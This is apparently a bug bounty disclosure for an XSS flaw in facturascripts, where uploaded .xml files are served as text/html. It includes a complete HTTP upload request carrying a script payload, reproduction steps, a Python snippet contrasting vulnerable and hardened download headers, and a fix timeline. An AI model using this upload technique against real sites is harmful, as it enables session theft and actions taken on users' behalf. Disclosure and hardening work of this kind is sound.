Cross-site scripting - Reflected via upload `.xml` file in neorazorx/facturascripts

Valid

Reported on Apr 30th 2022


Description

When a user uploads a file with the .xml extension and then accesses that file directly, the server responds with Content-Type: text/html, so the browser processes the XML as an HTML document and executes any script it contains.

Proof of Concept

POST /facturascripts/EditAttachedFile?code=1&action=save-ok HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------116175579928758251263819370629
Content-Length: 1356
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditAttachedFile?code=1&action=save-ok
Cookie: <web-cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="action"

insert
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="activetab"

EditAttachedFile
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="code"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="multireqtoken"

99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|4vnVMk
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="path"; filename="xss.xml"
Content-Type: text/xml

<script>alert(window.origin)</script>
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="filename"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="mimetype"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="size"

0
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="date"

2022-04-30
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="hour"

17:45:45
-----------------------------116175579928758251263819370629--

Step to reproduce

  1. Prepare a file xss.xml with the content:
<script>alert(window.origin)</script>
  2. Upload the xss.xml file in Admin -> Library
  3. Click download; the file is rendered as HTML and the script executes

Impact

This vulnerability allows arbitrary JavaScript to execute in the victim's browser in the application's origin: stealing the user's cookie, performing HTTP requests on their behalf, reading the content of same-origin pages, etc.
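As an added illustration of the defensive side (this is not code from facturascripts, which is written in PHP), the following Python puts the weak header pattern the report describes beside a hardened download handler and a check a test suite could run against either; the RENDERABLE set and the function names are assumptions made for this example.

```python
"""Serving user uploads so that an uploaded .xml (or .html, .svg) is never
rendered as a same-origin page.

The weak pattern is the one in the report: the download endpoint answers with
Content-Type: text/html and an inline disposition, so the browser executes any
<script> in the uploaded body. The hardened pattern forces a download, pins a
non-executable Content-Type derived from the stored filename (never from the
client-supplied "mimetype" form field), and disables content sniffing."""
import mimetypes
from pathlib import PurePosixPath

# Types a browser will parse as a document and run script from.
# Constructed for this example; extend it to whatever your app stores.
RENDERABLE = {"text/html", "application/xhtml+xml", "image/svg+xml",
              "text/xml", "application/xml"}


def weak_headers(filename: str) -> dict:
    """The vulnerable behaviour described in the report: every attachment is
    sent back inline as text/html, whatever its extension."""
    return {"Content-Type": "text/html",
            "Content-Disposition": f'inline; filename="{filename}"'}


def hardened_headers(filename: str) -> dict:
    """Serve an upload as an opaque download with a non-renderable type."""
    base = PurePosixPath(filename).name          # drop any path components
    guessed, _ = mimetypes.guess_type(base)
    ctype = guessed or "application/octet-stream"
    if ctype in RENDERABLE:                      # .xml/.html/.svg -> plain text
        ctype = "text/plain"
    safe_name = base.replace('"', "")            # keep the header well-formed
    return {"Content-Type": ctype,
            "Content-Disposition": f'attachment; filename="{safe_name}"',
            "X-Content-Type-Options": "nosniff"}


def browser_would_execute_script(headers: dict) -> bool:
    """Detection check: does this response let the browser render the body as
    a same-origin document (renderable type served inline)?"""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    disposition = headers.get("Content-Disposition", "inline").lower()
    return ctype in RENDERABLE and disposition.startswith("inline")
```

Run `browser_would_execute_script` over the headers your download endpoint actually emits for an uploaded xss.xml; it returns True for the weak pattern and False once the file is served as an attachment with a non-renderable type.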

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. 22 days ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back 21 days ago
Carlos Garcia validated this vulnerability 19 days ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia (Maintainer), 18 days ago:

Fixed here https://github.com/NeoRazorX/facturascripts/commit/31a6b6029cd95b2d64baac3d9209cc15e1f928e8

Carlos Garcia confirmed that a fix has been merged on 31a6b6 17 days ago
Carlos Garcia has been awarded the fix bounty